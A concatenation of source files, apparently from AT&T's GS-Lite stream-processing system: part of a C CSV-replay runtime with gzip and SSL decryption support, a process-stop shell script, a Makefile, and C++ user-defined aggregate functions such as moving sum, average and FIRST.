		print_error((gs_sp_t)"csv_replay_init::Either \"Filename\" or \"Dirname\" must be defined");
		exit(0);
	}
	// only the first character of the property is used as the delimiter
	tempdel=get_iface_properties(device,(gs_sp_t)"csvseparator");
	if (tempdel != 0 ) {
		csvdel = tempdel[0];
		csv_set_delim(csvdel);
	}
	if ((singlefiletmp=get_iface_properties(device,(gs_sp_t)"singlefile"))!=0) {
		if (strncmp(singlefiletmp,"TRUE",4)==0) {
			singlefile=1;
			if (verbose)
				fprintf(stderr,"SINGLEFILE ENABLED\n");
		} else {
			if (verbose)
				fprintf(stderr,"SINGLEFILE DISABLED\n");
		}
	}
	if ((compressortmp=get_iface_properties(device,(gs_sp_t)"compressor"))!=0) {
		if (strncmp(compressortmp,"GZIP",4)==0) {
			use_gzip=1;
			if (verbose)
				fprintf(stderr,"USING ZLIP COMPRESSOR ENABLED\n");
		} else {
			print_error((gs_sp_t)"csv_replay_init::Unknown value for interface property \"Compressor\"");
			exit(0);
		}
	}
	if ((bsatmp=get_iface_properties(device,(gs_sp_t)"bsa"))!=0) {
		if (strncmp(bsatmp,"TRUE",4)==0) {
#ifndef BSA_ENABLED
			print_error((gs_sp_t)"csv_replay_init::runtime not built with BSA support to use BSA interfaces");
			exit(0);
#endif
			use_bsa=1;
			if (verbose)
				fprintf(stderr,"USING BSA STREAMS\n");
		}
	}
	// delay (seconds) before the reader starts consuming data
	if ((delaytmp=get_iface_properties(device,(gs_sp_t)"startupdelay"))!=0) {
		if (verbose) {
			fprintf(stderr,"Startup delay of %u seconds\n",atoi(delaytmp));
		}
		startupdelay=atoi(delaytmp);
	}
	// generator-provided bound on the highest CSV field position used
	if ((maxfieldtmp=get_iface_properties(device,(gs_sp_t)"_max_csv_pos"))!=0) {
		max_field_csv=atoi(maxfieldtmp);
	}
	if ((gshubtmp=get_iface_properties(device,(gs_sp_t)"gshub"))!=0) {
		if (verbose) {
			fprintf(stderr,"CSV format using gshub\n");
		}
		gshub=1;
		if (!name) {
			print_error((gs_sp_t)"csv_replay_init::Filename must be defined for gshub interfaces");
			exit(0);
		}
	}
	pkey_fname=get_iface_properties(device,(gs_sp_t)"privatekey");
	pwd_fname=get_iface_properties(device,(gs_sp_t)"password");
	if ((encryptedtmp=get_iface_properties(device,(gs_sp_t)"encrypted"))!=0) {
		if (strncmp(encryptedtmp,"TRUE",4)==0) {
#ifndef SSL_ENABLED
			print_error((gs_sp_t)"csv_replay_init::runtime not built with SSL support to use encrypted interfaces");
			exit(0);
#else
			use_decryption=1;
			if (verbose) {
				fprintf(stderr,"CSV file is encrypted\n");
			}
			if (!pkey_fname || !pwd_fname) {
				print_error((gs_sp_t)"csv_replay_init::privatekey and/or password filenames not specified for encrypted interface");
				exit(0);
			}
			OpenSSL_add_all_algorithms();
			ERR_load_crypto_strings();
			// Read password file
			FILE* in_fd = fopen(pwd_fname, "r");
			if (!in_fd) {
				fprintf(stderr, "Unable to open password file %s\n", pwd_fname);
				exit(0);
			}
			if (!fgets(pwd, CSVMAXLINE, in_fd)) {
				fprintf(stderr, "Error reading password from file %s\n", pwd_fname);
				exit(0);
			}
			// strip trailing whitespace/newline from the password line
			strtok(pwd, "\r\n\t ");
			fclose(in_fd);
			// Read the private key (pass_cb supplies the password)
			in_fd = fopen(pkey_fname, "r");
			if (!in_fd) {
				fprintf(stderr, "Unable to open private key file %s\n", pkey_fname);
				exit(0);
			}
			rkey = PEM_read_PrivateKey(in_fd, NULL, pass_cb, NULL);
			if (!rkey) {
				fprintf(stderr, "Unable to read private key file %s\n", pkey_fname);
				exit(-1);
			}
			fclose(in_fd);
#endif
		}
	}
	cur_packet.ptype=PTYPE_CSV;
	return 0;
}
// Scan `chunk` — which holds `leftover` previously-unconsumed bytes
// followed by `chunk_size` newly-read bytes — for complete '\n'-terminated
// lines, parsing each and handing it to the FTA runtime. Any trailing
// partial line is moved to the front of `chunk` and its length recorded in
// the global `leftover` for the next call. Returns tuples processed.
static inline int consume_chunk(gs_sp_t chunk, gs_uint32_t chunk_size) {
	int tuple_consumed = 0;
	gs_sp_t linepos = chunk;
	// the first `leftover` bytes were already searched last time, so start
	// looking for a newline in the freshly appended data only
	gs_sp_t new_linepos = (gs_sp_t)memchr(linepos + leftover, '\n', chunk_size);
	gs_sp_t end_pos = chunk + chunk_size + leftover;
	// BUG FIX: was `leftover = chunk_size`, which silently dropped the old
	// partial line's byte count whenever a chunk contained no newline.
	leftover += chunk_size;
	while (new_linepos) {
		csv_parse_line(linepos, new_linepos - linepos);
		rts_fta_process_packet(&cur_packet);
		tuple_consumed++;
		linepos = new_linepos + 1;
		leftover = end_pos - linepos;
		new_linepos = (gs_sp_t)memchr(linepos, '\n', leftover);
	}
	// BUG FIX: memmove, not memcpy — source and destination overlap when
	// the remaining tail is longer than the consumed prefix.
	memmove(chunk, linepos, leftover);
	return tuple_consumed;
}
// Process one raw chunk of `chunk_size` bytes: in gzip mode inflate from
// the `in` buffer into `out` (repeatedly, since one input chunk can expand
// to many output chunks) and parse each decompressed piece; otherwise the
// data is already sitting in `out` and is parsed directly.
// Returns the number of tuples produced (0 on inflate error).
static int csv_process_chunk(gs_uint32_t chunk_size)
{
	gs_int32_t ret;
	gs_uint32_t have = chunk_size;
	gs_uint32_t tuple_consumed = 0;
	if (use_gzip) {
		strm.avail_in = have;
		strm.next_in = in;
		/* run inflate() on input until output buffer not full */
		do {
			strm.avail_out = CHUNK;
			// decompress past the carried-over partial line in `out`
			strm.next_out = out + leftover;
			ret = inflate(&strm, Z_NO_FLUSH);
			/* assert(ret != Z_STREAM_ERROR); state not clobbered */
			switch (ret) {
			case Z_NEED_DICT:
				ret = Z_DATA_ERROR; /* and fall through */
			case Z_DATA_ERROR:
			case Z_MEM_ERROR:
				(void)inflateEnd(&strm);
#ifdef BSA_ENABLED
				close_file_bsa();
#endif
				fprintf(stderr,"Error inflating data chunk\n");
				return 0;
			}
			have = CHUNK - strm.avail_out;
			tuple_consumed += consume_chunk((gs_sp_t)out, have);
		} while (strm.avail_out == 0);
		/* done when inflate() says it's done */
		if (ret == Z_STREAM_END) {
			inflateEnd(&strm);
#ifdef BSA_ENABLED
			close_file_bsa();
#endif
		}
	} else {
		// uncompressed: csv_read_chunk already placed the bytes in `out`
		tuple_consumed += consume_chunk((gs_sp_t)out, have);
	}
	return tuple_consumed;
}
// Fetch the next raw chunk from whichever source is configured (gshub
// socket, BSA stream, decrypted PKCS7 BIO, or plain file), rolling over to
// the next file on EOF. Data lands in `in` (gzip mode) or after the
// carried-over bytes in `out` (plain mode).
// Returns bytes read, -1 on timeout/no-new-file, -2 when a single file is
// fully processed (caller shuts down).
static gs_int32_t csv_read_chunk() {
	gs_int32_t have;
	if (gshub!=0) {
		return read_chunk_socket((gs_sp_t)out, CHUNK);
	} else {
		// compressed data is staged in `in` and inflated into `out` later
		gs_sp_t read_pos = (gs_sp_t)(use_gzip ? in : (out + leftover));
#ifdef BSA_ENABLED
		if (use_bsa) {
			if (ifh == 0) next_file_bsa();
			if (ifh == 0) // if no new files available return
				return -1; // -1 indicates a timeout
			// a 0-byte read means EOF on the current BSA file
			while ((have = reader->read(read_pos, CHUNK)) == 0) {
				close_file_bsa();
				next_file_bsa();
				if (ifh == 0) { // if no new files available return
					return -1; // -1 indicates a timeout
				}
			}
		} else {
#endif
			if (fd <= 0) next_file();
#ifdef SSL_ENABLED
			if (use_decryption) {
				// read decrypted bytes out of the PKCS7 BIO
				while ((have = BIO_read (mem_io, read_pos, CHUNK)) == 0) {
					if (singlefile==1) {
						if(verbose) {
							fprintf(stderr,"SINGLEFILE PROCESSING DONE! RTS SAYS BYE\n");
						}
						return -2;
					} else {
						next_file();
					}
				}
			} else {
#endif
				while ((have = read(fd, read_pos, CHUNK)) == 0) {
					if (singlefile==1) {
						if(verbose) {
							fprintf(stderr,"SINGLEFILE PROCESSING DONE! RTS SAYS BYE\n");
						}
						return -2;
					} else {
						next_file();
					}
				}
#ifdef SSL_ENABLED
			}
#endif
#ifdef BSA_ENABLED
		}
#endif
	}
	return have;
}
// Main ingest step: read and parse chunks until ~50000 tuples have been
// produced, then return 0 so the caller can service the message queue.
// A read timeout returns early; end-of-input (-2) signals completion via
// rts_fta_done() and then spins on the message queue forever.
static gs_retval_t csv_process_input()
{
	unsigned cnt = 0;
	static unsigned totalcnt = 0;	// lifetime tuple count, for rate reporting
	gs_int32_t retval;
	while(cnt < 50000) { // process up to 50000 tuples at a time
		retval = csv_read_chunk();
		if (retval == -1) return 0; // got a timeout so service message queue
		if (retval == -2) {
			// we signal that everything is done
			if (verbose)
				fprintf(stderr,"Done processing, waiting for things to shut down\n");
			rts_fta_done();
			// now just service message queue until we get killed or lose connectivity
			while (true) {
				fta_start_service(0); // service all waiting messages
				usleep(1000); // sleep a millisecond
			}
		}
		cnt += csv_process_chunk((gs_uint32_t)retval);
	}
	totalcnt = totalcnt + cnt;
	if (verbose) {
#ifdef BSA_ENABLED
		// BSA keeps a millisecond clock; the plain path uses whole seconds
		fprintf(stderr,"%s: Processed %u tuples, rate = %lf tup/sec\n", dev, totalcnt, 1000.0 * (double)totalcnt / (double)bsa_total_elapsed_time);
#else
		fprintf(stderr,"Processed %u tuples, rate = %lf tup/sec\n", totalcnt, (double)totalcnt / (double)(time(NULL) - st_time));
#endif
	}
	return 0;
}
// Entry point for the CSV replay runtime: parse interface configuration,
// initialize the host library and LFTAs, honor the configured startup
// delay, wait for gshub's start-processing signal, then loop forever
// reading data and servicing the control-message queue. Never returns
// normally; exits with distinct codes on the various failures.
extern "C" gs_retval_t main_csv(gs_int32_t devicenum, gs_sp_t device, gs_int32_t mapcnt, gs_sp_t map[]) {
	gs_uint32_t cont;	// NOTE(review): compared against time(NULL) below — assumes 32-bit epoch fits; verify
	endpoint mygshub;
	dev = device;
	csv_replay_init(device);
	/* initialize host_lib */
	if (verbose) {
		fprintf(stderr,"Init LFTAs for %s\n",device);
	}
	if (hostlib_init(LFTA,0,devicenum,mapcnt,map) < 0) {
		fprintf(stderr,"%s::error:could not initiate host lib for clearinghouse\n",
				device);
		exit(7);
	}
	fta_init(device); /* xxx probably should get an error code back, but none is provided */
	// set maximum field number to be extracted by csv parser
	csv_set_maxfield(max_field_csv);
	cont = startupdelay + time(0);
	if (verbose) { fprintf(stderr,"Start startup delay"); }
	// during the startup delay keep the message queue drained
	while (cont > time(NULL)) {
		if (fta_start_service(0) < 0) {
			fprintf(stderr,"%s::error:in processing the msg queue\n", device);
			exit(9);
		}
		usleep(1000); /* sleep for one millisecond */
	}
	if (verbose) { fprintf(stderr,"... Done\n"); }
	// open the connection to the data source
	if (gshub != 0) { init_socket();}
	// wait to process till we get the signal from GSHUB
	if (get_hub(&mygshub) != 0) {
		print_error((gs_sp_t)"ERROR:could not find gshub for data source");
		exit(0);
	}
	while(get_startprocessing(mygshub,get_instance_name(),0) != 0) {
		usleep(100);
		if (fta_start_service(0) < 0) {
			fprintf(stderr,"%s::error:in processing the msg queue\n", device);
			exit(9);
		}
	}
	/* now we enter an endless loop to process data */
	if (verbose) {
		fprintf(stderr,"Start processing %s\n",device);
	}
#ifdef BSA_ENABLED
	if (use_bsa) {
		stream = BSA::FileStream::ISubStream::construct(std::string(name));
		stream->init ();
	}
#endif
	st_time = time(NULL);
	while (true) {
		if (csv_process_input() < 0) {
			fprintf(stderr,"%s::error:in processing records\n", device);
			exit(8);
		}
		/* process all messages on the message queue*/
		if (fta_start_service(0) < 0) {
			fprintf(stderr,"%s::error:in processing the msg queue\n", device);
			exit(9);
		}
	}
	return 0;	// unreachable; present to satisfy the signature
}
<file_sep>#!/bin/sh
./stopit
killall gsprintconsole
killall gen_feed.py
killall -9 gsprintconsole
killall -9 gen_feed.py
<file_sep># ------------------------------------------------
# Copyright 2014 AT&T Intellectual Property
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------
# Build flags and sources for the lfta runtime prototype object.
CC=gcc -g -O3 -msse4.2 -fexpensive-optimizations -I libdag/include -I ../../../../include/lfta/ -I ../../../../include/ -I .././include/ -I ../../gscphost/include -I ../../../../include/lfta/local -I /usr/local/include
CXX=g++ -g -O3 -msse4.2 -fexpensive-optimizations -I libdag/include -I ../../../../include/lfta/ -I ../../../../include/ -I .././include/ -I ../../gscphost/include -I ../../../../include/lfta/local
SOURCE_C = rts_proto.c
SOURCE_CC =
SOURCE = $(SOURCE_C) $(SOURCE_CC)
OBJECTS = $(SOURCE_C:.c=.o) $(SOURCE_CC:.cc=.o)
# rts_proto.o is built via make's implicit .c -> .o rule using $(CC) above
all: rts_proto.o
# BUG FIX: was $(INCDIR/lfta), which expands the undefined variable named
# "INCDIR/lfta" and always produced an empty string; the intent is the
# lfta subdirectory under $(INCDIR).
LFTA_DIR=$(INCDIR)/lfta
clean:
	rm -f *.o *.a core
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include "gsconfig.h"
#include "gstypes.h"
#include "hfta_udaf.h"
#include "rts_udaf.h"
#include <stdio.h>
#include <limits.h>
#include <math.h>
//#include <memory.h>
#include <string.h>
#include <sys/time.h>
#include <iostream>
#include "hfta_runtime_library.h"
#include"stringhash.h"
#define max(a,b) ((a) > (b) ? (a) : (b))
#define min(x,y) ((x) < (y) ? (x) : (y))
#define lg(x) (log(x) / log(2))
using namespace std;
// -------------------------------------------------------------------
// moving sum over N intervals
// State for a moving sum over the last N time intervals: a circular buffer
// of per-interval sums, advanced one slot per window close (REINIT).
struct moving_sum_udaf_str{
	gs_uint32_t N;		// number of intervals in the window (fixed on first update)
	gs_uint32_t pos;	// slot index of the interval currently accumulating
	gs_uint32_t *sums;	// lazily allocated circular buffer of N interval sums
};
// Zero the moving-sum scratchpad; the circular buffer itself is allocated
// lazily by the first UPDATE call, which also fixes N.
void moving_sum_udaf_HFTA_AGGR_INIT_(gs_sp_t buf){
	struct moving_sum_udaf_str * state = (struct moving_sum_udaf_str *) buf;
	state->N = 0;
	state->pos = 0;
	state->sums = NULL;
}
// Add sample `s` to the current interval's sum. On the first call the
// N-slot circular buffer is allocated zeroed; N is fixed from then on.
void moving_sum_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint32_t s, gs_uint32_t N) {
	struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) buf;
	if(u->sums == NULL){
		// calloc zeroes the slots — replaces malloc plus an explicit
		// zeroing loop that compared a signed index against unsigned N
		u->sums = (gs_uint32_t *)calloc(N, sizeof(gs_uint32_t));
		u->N = N;
	}
	u->sums[u->pos] += s;
}
// Superaggregate update: `sub_sum` packs a subaggregate's interval sum in
// the low 32 bits and its window length N in the high 32 bits. The first
// call allocates the zeroed N-slot circular buffer.
void super_moving_sum_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint64_t sub_sum) {
	struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) buf;
	gs_uint32_t s = (gs_uint32_t)(sub_sum & 0xffffffff);
	if(u->sums == NULL){
		gs_uint32_t N = (gs_uint32_t)((sub_sum & 0xffffffff00000000ull) >> 32);
		// calloc zeroes the slots — replaces malloc plus an explicit
		// zeroing loop that compared a signed index against unsigned N
		u->sums = (gs_uint32_t *)calloc(N, sizeof(gs_uint32_t));
		u->N = N;
	}
	u->sums[u->pos] += s;
}
// OUTPUT hands out a pointer to the scratchpad itself; the final value is
// computed later by an extraction function (moving_sum_extract*).
void moving_sum_udaf_HFTA_AGGR_OUTPUT_(gs_p_t *result, gs_sp_t buf){
	*result = (gs_p_t)(buf);
}
// Release the lazily allocated circular buffer.
void moving_sum_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf){
	struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) buf;
	if(u->sums != NULL)
		free(u->sums);
}
// Window close: advance to the next circular-buffer slot (wrapping after
// the last) and clear it so the new interval starts from zero.
void moving_sum_udaf_HFTA_AGGR_REINIT_( gs_sp_t buf){
	struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) buf;
	gs_uint32_t next = u->pos + 1;
	if(next >= u->N)
		next = 0;
	u->pos = next;
	u->sums[next] = 0;
}
// Extraction: unweighted total over all N interval sums — the plain
// moving sum across the full window.
gs_uint32_t moving_sum_extract(gs_p_t result){
	struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) result;
	gs_uint32_t total = 0;
	for(gs_uint32_t slot = 0; slot < u->N; slot++)
		total += u->sums[slot];
	return total;
}
// Extraction: exponentially weighted moving sum — the interval k steps
// behind the current one is weighted by alpha^k, walking backwards around
// the circular buffer starting at the current slot.
gs_float_t moving_sum_extract_exp(gs_p_t result, gs_float_t alpha){
	struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) result;
	gs_uint32_t p=0, i=0;
	gs_float_t s=0.0, m=1.0;
	p=u->pos;	// newest interval first (weight 1.0)
	for(i=0; i<u->N;i++){
		// BUG FIX: was u->sums[i] — the age cursor p was advanced but never
		// used, so weights were applied in buffer order, not by interval age
		s += u->sums[p]*m;
		if(p==0)
			p=u->N - 1;	// wrap backwards around the circular buffer
		else
			p--;
		m *= alpha;
	}
	return s;
}
// -------------------------------------------------------------------
// sum over 3 intervals : test rUDAF
// Scratchpad for sum3: sliding sum over the three most recent windows.
struct sum3_udaf_str{
	gs_uint32_t s_2;	// sum from two windows ago
	gs_uint32_t s_1;	// sum from the previous window
	gs_uint32_t s_0;	// sum accumulating in the current window
};
// Clear all three window sums.
void sum3_HFTA_AGGR_INIT_(gs_sp_t buf) {
	struct sum3_udaf_str * state = (struct sum3_udaf_str *) buf;
	state->s_0 = state->s_1 = state->s_2 = 0;
}
// Fold one sample into the current window's sum.
void sum3_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint32_t s) {
	struct sum3_udaf_str * state = (struct sum3_udaf_str *) buf;
	state->s_0 = state->s_0 + s;
}
// Report the total across the three most recent windows.
void sum3_HFTA_AGGR_OUTPUT_(gs_uint32_t *result, gs_sp_t buf) {
	struct sum3_udaf_str * state = (struct sum3_udaf_str *) buf;
	gs_uint32_t total = state->s_0 + state->s_1 + state->s_2;
	*result = total;
}
// Nothing to release: the scratchpad owns no heap memory.
void sum3_HFTA_AGGR_DESTROY_(gs_sp_t buf) {
}
// Window close: age the sums by one window and restart the current one.
void sum3_HFTA_AGGR_REINIT_( gs_sp_t buf) {
	struct sum3_udaf_str * state = (struct sum3_udaf_str *) buf;
	state->s_2 = state->s_1;
	state->s_1 = state->s_0;
	state->s_0 = 0;
}
#define HISTORY_LENGTH 1024
/////////////////////////////////////////////////////////////////////////
///// Calculate the average of all positive gs_float_t numbers
// Scratchpad for POSAVG: running sum and count of accepted samples.
struct posavg_struct{
	gs_float_t sum;
	gs_float_t cnt;
};
void POSAVG_HFTA_AGGR_INIT_(gs_sp_t buf) {
	struct posavg_struct * a = (struct posavg_struct *) buf;
	a->sum=0;
	a->cnt=0;
	return;
}
// Accumulate v. Note: despite the banner ("positive numbers") the filter
// accepts v == 0 as well — only strictly negative samples are excluded.
void POSAVG_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_float_t v) {
	struct posavg_struct * a = (struct posavg_struct *) buf;
	if (v>=0) {
		a->sum=a->sum+v;
		a->cnt=a->cnt+1;
	}
	return;
}
// Average of accepted samples; -1 signals "no non-negative samples seen".
void POSAVG_HFTA_AGGR_OUTPUT_(gs_float_t * v, gs_sp_t buf) {
	struct posavg_struct * a = (struct posavg_struct *) buf;
	if (a->cnt>0) {
		*v=(a->sum/a->cnt);
	} else {
		*v=-1;
	}
	return;
}
// No heap state to release.
void POSAVG_HFTA_AGGR_DESTROY_(gs_sp_t buf) {
	return;
}
/////////////////////////////////////////////////////////////////////////
///// avg_udaf (simple example)
// struct received from subaggregate
struct avg_udaf_lfta_struct_t{
	gs_int64_t sum;
	gs_uint32_t cnt;
};
// scratchpad struct
struct avg_udaf_hfta_struct_t{
	gs_int64_t sum;
	gs_uint32_t cnt;
};
// avg_udaf functions
void avg_udaf_HFTA_AGGR_INIT_(gs_sp_t b){
	avg_udaf_hfta_struct_t *s = (avg_udaf_hfta_struct_t *) b;
	s->sum = 0;
	s->cnt = 0;
}
void avg_udaf_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v){
	avg_udaf_hfta_struct_t *s = (avg_udaf_hfta_struct_t *) b;
	s->sum += v;
	s->cnt ++;
}
// OUTPUT exposes the scratchpad as a 12-byte shallow-copied vstring:
// 8-byte sum followed by 4-byte cnt. NOTE(review): the 12-byte length
// assumes sum at offset 0 and cnt at offset 8 (standard alignment);
// confirm no exotic padding on target ABIs.
void avg_udaf_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b){
	r->length = 12;
	r->offset = (gs_p_t)(b);
	r->reserved = SHALLOW_COPY;
}
void avg_udaf_HFTA_AGGR_DESTROY_(gs_sp_t b){
	return;
}
// avg_udaf superaggregate functions: merge the packed (sum,cnt) pairs
// received from subaggregates.
void avg_udaf_hfta_HFTA_AGGR_INIT_(gs_sp_t b){
	avg_udaf_hfta_struct_t *s = (avg_udaf_hfta_struct_t *) b;
	s->sum = 0;
	s->cnt = 0;
}
void avg_udaf_hfta_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
	// silently ignore malformed sub-results (wrong payload size)
	if(v->length != 12) return;
	avg_udaf_hfta_struct_t *s = (avg_udaf_hfta_struct_t *) b;
	avg_udaf_lfta_struct_t *vs = (avg_udaf_lfta_struct_t *)(v->offset);
	s->sum += vs->sum;
	s->cnt += vs->cnt;
}
void avg_udaf_hfta_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b){
	r->length = 12;
	r->offset = (gs_p_t)(b);
	r->reserved = SHALLOW_COPY;
}
void avg_udaf_hfta_HFTA_AGGR_DESTROY_(gs_sp_t b){
	return;
}
// Extraction function: final average = sum / cnt from the packed state.
// Returns 0 for a malformed payload; divides without a cnt==0 guard
// (cnt > 0 whenever a well-formed 12-byte state was produced by UPDATE).
gs_float_t extr_avg_fcn(vstring *v){
	if(v->length != 12) return 0;
	avg_udaf_hfta_struct_t *vs = (avg_udaf_hfta_struct_t *)(v->offset);
	gs_float_t r = (gs_float_t)(vs->sum) / vs->cnt;
	return r;
}
/////////////////////////////////////////////////////////
// FIRST aggregate: remember the first value seen in the group.
// hfta only
// NOTE(review): UINT_MAX doubles as the "no value seen yet" sentinel for
// every numeric variant (including the 64-bit ones), so an input value
// equal to UINT_MAX is indistinguishable from "uninitialized" and will be
// overwritten by a later update -- presumably acceptable; confirm.
// uint
void FIRST_HFTA_AGGR_INIT_(gs_uint32_t* scratch) {
	*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_HFTA_AGGR_REINIT_(gs_uint32_t* scratch) { }
void FIRST_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
	// keep only the first value; all later updates are ignored
	if (*scratch == UINT_MAX)
		*scratch = val;
}
void FIRST_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
	*res = *scratch;
}
void FIRST_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { }
// int
void FIRST_HFTA_AGGR_INIT_(gs_int32_t* scratch) {
	*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_HFTA_AGGR_REINIT_(gs_int32_t* scratch) { }
void FIRST_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
	if (*scratch == UINT_MAX)
		*scratch = val;
}
void FIRST_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
	*res = *scratch;
}
void FIRST_HFTA_AGGR_DESTROY_(gs_int32_t* scratch) { }
// ullong
void FIRST_HFTA_AGGR_INIT_(gs_uint64_t* scratch) {
	*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_HFTA_AGGR_REINIT_(gs_uint64_t* scratch) { }
void FIRST_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
	if (*scratch == UINT_MAX)
		*scratch = val;
}
void FIRST_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
	*res = *scratch;
}
void FIRST_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { }
// llong
void FIRST_HFTA_AGGR_INIT_(gs_int64_t* scratch) {
	*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_HFTA_AGGR_REINIT_(gs_int64_t* scratch) { }
void FIRST_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
	if (*scratch == UINT_MAX)
		*scratch = val;
}
void FIRST_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
	*res = *scratch;
}
void FIRST_HFTA_AGGR_DESTROY_(gs_int64_t* scratch) { }
// string
// For strings a NULL payload pointer is the "no value yet" sentinel.
void FIRST_HFTA_AGGR_INIT_(vstring* scratch) {
	scratch->offset= 0;
}
void FIRST_HFTA_AGGR_REINIT_(vstring* scratch) { }
void FIRST_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val) {
	if (!scratch->offset) {
		// shallow copy: scratch aliases val's buffer rather than owning it
		scratch->length = val->length;
		scratch->offset = val->offset;
		scratch->reserved = SHALLOW_COPY;
	}
}
void FIRST_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch) {
	*res = *scratch;
}
void FIRST_HFTA_AGGR_DESTROY_(vstring* scratch) { }
// hfta/lfta split versions of FIRST: same semantics as the hfta-only
// family above, but with type-suffixed names so that the hfta half of a
// split aggregate can be resolved per input type.
// uint
void FIRST_hfta_HFTA_AGGR_INIT_(gs_uint32_t* scratch) {
	*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_hfta_HFTA_AGGR_REINIT_(gs_uint32_t* scratch) { }
void FIRST_hfta_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
	// keep only the first value received from the lfta side
	if (*scratch == UINT_MAX)
		*scratch = val;
}
void FIRST_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
	*res = *scratch;
}
void FIRST_hfta_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { }
// int
void FIRST_INT_hfta_HFTA_AGGR_INIT_(gs_int32_t* scratch) {
	*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_INT_hfta_HFTA_AGGR_REINIT_(gs_int32_t* scratch) { }
void FIRST_INT_hfta_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
	if (*scratch == UINT_MAX)
		*scratch = val;
}
void FIRST_INT_hfta_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
	*res = *scratch;
}
void FIRST_INT_hfta_HFTA_AGGR_DESTROY_(gs_int32_t* scratch) { }
// ullong
void FIRST_ULL_hfta_HFTA_AGGR_INIT_(gs_uint64_t* scratch) {
	*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_ULL_hfta_HFTA_AGGR_REINIT_(gs_uint64_t* scratch) { }
void FIRST_ULL_hfta_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
	if (*scratch == UINT_MAX)
		*scratch = val;
}
void FIRST_ULL_hfta_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
	*res = *scratch;
}
void FIRST_ULL_hfta_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { }
// llong
void FIRST_LL_hfta_HFTA_AGGR_INIT_(gs_int64_t* scratch) {
	*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_LL_hfta_HFTA_AGGR_REINIT_(gs_int64_t* scratch) { }
void FIRST_LL_hfta_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
	if (*scratch == UINT_MAX)
		*scratch = val;
}
void FIRST_LL_hfta_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
	*res = *scratch;
}
void FIRST_LL_hfta_HFTA_AGGR_DESTROY_(gs_int64_t* scratch) { }
// string
// NULL payload pointer marks "no value yet"; first update shallow-copies.
void FIRST_STR_hfta_HFTA_AGGR_INIT_(vstring* scratch) {
	scratch->offset= 0;
}
void FIRST_STR_hfta_HFTA_AGGR_REINIT_(vstring* scratch) { }
void FIRST_STR_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val) {
	if (!scratch->offset) {
		scratch->length = val->length;
		scratch->offset = val->offset;
		scratch->reserved = SHALLOW_COPY;
	}
}
void FIRST_STR_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch) {
	*res = *scratch;
}
void FIRST_STR_hfta_HFTA_AGGR_DESTROY_(vstring* scratch) { }
/////////////////////////////////////////////////////////
// LAST aggregate: remember the most recent value seen in the group.
// Every update overwrites the scratch, so no "uninitialized" sentinel is
// needed; OUTPUT simply reports the last stored value.
// hfta only
// uint
